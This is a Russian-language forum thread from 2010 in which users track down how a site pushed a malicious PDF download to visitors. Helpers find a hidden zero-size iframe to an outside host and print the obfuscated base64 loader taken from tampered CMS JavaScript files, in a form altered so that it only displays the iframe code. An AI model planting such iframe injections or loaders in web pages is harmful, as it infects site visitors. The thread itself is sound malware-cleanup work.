помогите отыскать вирус - Компьютерный форум OSzone.net

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)

- Лечение систем от вредоносных программ (http://forum.oszone.net/forumdisplay.php?f=87)

- - помогите отыскать вирус (http://forum.oszone.net/showthread.php?t=168101)

AACC	21-02-2010 17:03 1352654

помогите отыскать вирус

При заходе на сайт ripbox_ru (вернее при первом заходе) если сменить IP то выскочит снова

выскакивает в менеджере загрузок файл и просится счкачать - _http://herewereytinj.com/tera/sv777/pdf.php после скачивания получается файл типа s85LQp3BqohkWX8OXrI2d.pdf (каждый раз другой выходит)

как я понял это разновидность pdf.php вируса

я сообщил админу того сайта... он проверил все шаблоны но вируса не обнаружил
проверка тут http://sitedrill.ru/ripbox.ru показывает что сайт чистый
но всё таки после каждого смена айпи адреса вылазит этот файл на закачку

куда могли спрятать вирус? как определить?

Sham	22-02-2010 16:47 1353370

скрытую загрузку можно по-разному сделать, в т.ч. через редирект...

Цитата:

Цитата AACC

я сообщил админу того сайта... он проверил все шаблоны но вируса не обнаружил »

хехе... за такие загрузки ему мб денюжка капает...

тема перенесена из раздела "Вебмастеру"

sanek_freeman

22-02-2010 17:22 1353383

AACC, здравствуйте. Выполните рекомендации и прикрепите к следующему сообщению полученные логи.

AACC	22-02-2010 19:40 1353480

Sham, тот админ к этим загрузкам не причем... он сам попросил меня чтоб я гдето спросил

sanek_freeman, мне не мой компьютор лечить нужно, а тот сайт

Drongo

22-02-2010 19:52 1353489

Цитата:

Цитата AACC

мне не мой компьютор лечить нужно, а тот сайт »

Зарегистрируйтесь на форуме и оставьте заявку в этой теме - Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте тут

Sham	22-02-2010 20:49 1353542

вверху, где баннер, каким-то скриптом суется iframe

HTML код:

<iframe width="0" height="0" src="http://herewereytinj.com/tera/sv777/index.php"></iframe>

очевидно, в него и подгружается pdf со скриптом (который выполняется очевидно только акробат-ридере).

Рекламные скрипты размещает админ, значит, пусть проверяет все скрипты рекламодателей.

AACC	23-02-2010 01:40 1353693

спасибо всем за помощь

сайт от вирусов отчистился... вирус скрывался в JS файлах
в данном случаи они скрывались в папке \engine\ajax
menu.js
js_edit.js
dle_ajax.js

админ перелил на оригенальные файлы и вирус исчез

вопрос как можно было их изменить так чтоб дата редактирования не изменилась?

п.с.

кстати есть для примера 1 файл с вирусом
если хотите могу показать

я его проверил касперским и там оказался вирус

Sham	23-02-2010 01:48 1353698

Сейчас скрытый фрейм как и был, никуда не исчез, но src редиректит на 404 (удален из удаленного хоста).

AACC	23-02-2010 01:50 1353699

Sham, каким способом ты видишь скрытый фрейм?

Sham	23-02-2010 01:56 1353701

FF + noscript (вверху слева квадратик - типа заблокирован фрейм), или через DOM (например, FF + firebug).

Теперь исчез вроде :), видимо у меня в кэше завалялось...

AACC	23-02-2010 02:04 1353705

Sham, можешь сделать скриншот в каком месте ты его видел?

Sham	23-02-2010 07:16 1353739

Цитата:

Цитата AACC

в каком месте ты его видел? »

внутри <div class="banner"></div>

Я так думаю, что движок того сайта занулен, и скачан незнамо откуда, со скриптами, уже содержащими левый код. Рынок таких загрузок (вирусов и зловредов) существует, и тот кто убирает защиту у платных CMS/форумов, таким образом может захотеть подзаработать...

AACC	23-02-2010 14:50 1353941

Вложений: 1

вот оказывается в каком файле был спрятан вредоносный код

пароль на архив - virus

я сканировал его разными утилитами... только Kaspersky Virus Removal Tool нашел в нем злой код

п.с.
кто занет как можно расшифровать код в том JS файле

Sham	24-02-2010 11:17 1354641

запустите код в HTML-файле - увидите код iframe (код обезопасен заменой тегов)

HTML код:

<script language="javascript" type="text/javascript">



function c7a2e3dfd1(y5){var nc='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var ne='';var qb,re,y3,xa,v0,n9,v7;var yf=0;do{xa=nc.indexOf(y5.charAt(yf++));v0=nc.indexOf(y5.charAt(yf++));n9=nc.indexOf(y5.charAt(yf++));v7=nc.indexOf(y5.charAt(yf++));qb=(xa<<2)|(v0>>4);re=((v0&15)<<4)|(n9>>2);y3=((n9&3)<<6)|v7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;ne+=String.fromCharCode(qb);if(n9!=64){if(re>=192)re+=848;else if(re==168)re=1025;else if(re==184)re=1105;ne+=String.fromCharCode(re);}if(v7!=64){if(y3>=192)y3+=848;else if(y3==168)y3=1025;else if(y3==184)y3=1105;ne+=String.fromCharCode(y3);}}while(yf<y5.length);document.write(ne.replace(/\</g,'&amp;lt;').replace(/\>/g,'&amp;gt;'));};c7a2e3dfd1('PGlmcmFtZSBzcmM9Imh0dHA6Ly9oZXJld2VyZXl0aW5qLmNvbS90ZXJhL3N2Nzc3L2luZGV4LnBocCIgd2lkdGg9MCBoZWlnaHQ9MD48L2lmcmFtZT4A');



</script>

тут мы видим функцию c7a2e3dfd1() раскодировки, и закодированную строку 'PGlmcmFtZ....', которая после раскодировки будет тегами, вставляемыми с помощью document.write

Время: 23:07.